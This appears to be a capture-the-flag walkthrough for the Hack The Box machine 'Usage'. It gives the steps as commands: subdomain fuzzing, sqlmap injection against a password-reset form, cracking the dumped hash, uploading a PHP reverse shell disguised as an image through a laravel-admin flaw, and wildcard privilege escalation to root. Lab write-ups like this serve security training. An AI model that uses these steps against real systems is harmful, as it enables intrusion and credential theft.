I add usage to /etc/hosts
with the corresponding ip address given. Then navigate to http://usage.htb
echo "10.10.11.18 usage.htb" | sudo tee -a /etc/hosts
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.usage.htb" -u http://usage.htb -fs 154
and I found admin.usage.htb
and added to /etc/hosts
echo "10.10.11.18 admin.usage.htb" | sudo tee -a /etc/hosts
whatweb 10.10.11.18
I Identified that this website is built using the Laravel framework
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/laravel
After checking out the Password Reset Option and finding it interesting, I fired up Burp Suite. I captured the POST request, as shown below:
I copied the POST request to a text file, which I named request.txt
POST /forget-password HTTP/1.1
Host: usage.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://usage.htb
Connection: close
Referer: http://usage.htb/forget-password
Cookie: XSRF-TOKEN=eyJpdiI6IkVMOEV1aUo4VjFHSEw3VEIzeERyRVE9PSIsInZhbHVlIjoiR3R4aVJxRWxMakUvNE1oVkQ0SS9DR3Q1T3FBTnZvS2JTY3R3dlFnZEJ2Z2NhaUp2V0FKTGtJSVdUS2VnK3crSlNrUEFnS2NQMXBBQllrWWJtYmdMR0w1SzdxR2dGY3lsT1BHeVRGNXp3bEttWUNRNmRBSkk4RXkxS0xYK1pOb0wiLCJtYWMiOiJlMzkyYTY1YzJjOGQ2MDdiNWI3MTRiZGIxYzk2N2FlMzNiYzFlNjZiZjk4NWE4MDkyYWE3NjgxMGI5NTMxMjgyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjUxUE5tOW5TYlAxd0FFQ3p2YjhEaXc9PSIsInZhbHVlIjoiTGl0Y3hFZU81Y2F2anNXcXNXa3pVd0RwNHcvYjMzbHBSWTlISW80VjZBSzVjTTZDd3FKVkhiNnhPdDVDejNYK2RVNDcvSERMOGc2dzNFMHpycTBSeGZSemk2TEZyZk5QWDE2N05YM21GcWFDcHJRSjVGSTRFajVhSTBOR0IvOTEiLCJtYWMiOiJiYzYwMDUyMGQzMTk2ODM2ZDkxMTI1NjhmYWFmYmU3YjgxZjMzMjUzZGExYWE1YTQ0MTA1NGI4NjMwYmFhMDU4IiwidGFnIjoiIn0%3D
Upgrade-Insecure-Requests: 1
_token=jElJgEoOoONVCfBoDfa67TPzd6VxBk4o43ObgKlY&email=1*
Now, let’s fire up SQLMap.
sqlmap -r request.txt --level 5 --risk 3 --batch
sqlmap -r request.txt --level 5 --risk 3 --batch --dbs
sqlmap -r request.txt --level 5 --risk 3 --batch -D usage_blog --tables
sqlmap -r request.txt --level 5 --risk 3 --batch -D usage_blog -T admin_users --columns
sqlmap -r request.txt --level 5 --risk 3 --batch -D usage_blog -T admin_users -C username,password --dump
So I copied the hash and saved it to pass.txt
echo "$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2" > pass.txt
let’s use john to crack it.
john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt
and I used these credntials to login to admin portal (admin : whatever1
)
Search for the latest vulnerabilities and find a warning about laravel-admin having an arbitrary file upload vulnerability (CVE-2023-24249). The affected version number is 1.8.19, and the system version number is 1.8.18. It should be affected, and finally found this article:
https://flyd.uk/post/cve-2023-24249/
Let’s prepare the webshell. Here we use kali’s php shell file locate at : /usr/share/webshells/php/php-reverse-shell.php
, modified the IP (tun0) and port (4444) information, and then use 010editor to create a picture horse.
cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php
Now let’s download the 010editor : https://www.sweetscape.com/download/010editor/
Let’s extract and run the 010editor
then i went to http://admin.usage.htb
and move to administrator settings
and i have downlod the admin image like below:
Then I open that image from 010editor ( Open File —> select the image file)
then In that image, I moved to the end of the header and paste the selected php-reverse-shell code:
then saved the file as shell.jpg
let’s create a netcat listner:
nc -nlvp 4444
Then I fired up the burp suite and intersept the process of uploading shell.jpg
.
so now we can change the filename to shell.jpg.php
and forward the requests:
so we got the reverse shell, so let’s get the user.txt
I was searching all the options to escalate privileges, but I couldn’t find anything. So, I tried listing all users on the system.
I realize I need to locate Xander’s credentials, but how can I do it? And then, I stumbled upon a file (.monitrc) that contained Xander’s credentials.
ssh xander@usage.htb
sudo -l
Since this is custom software, there’s no way to attack it using GTFOBins. However, we can utilize the strings command to read binary files.
Let’s use wildcards spare tricks: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks
so we able to get the root.txt
. so let’s use same method to get root shell
After creating the id_rsa
file and granting the required privileges with chmod 600 id_rsa
, I used SSH with the -i
option to specify the private key and connect to the server
BOOM !!! :D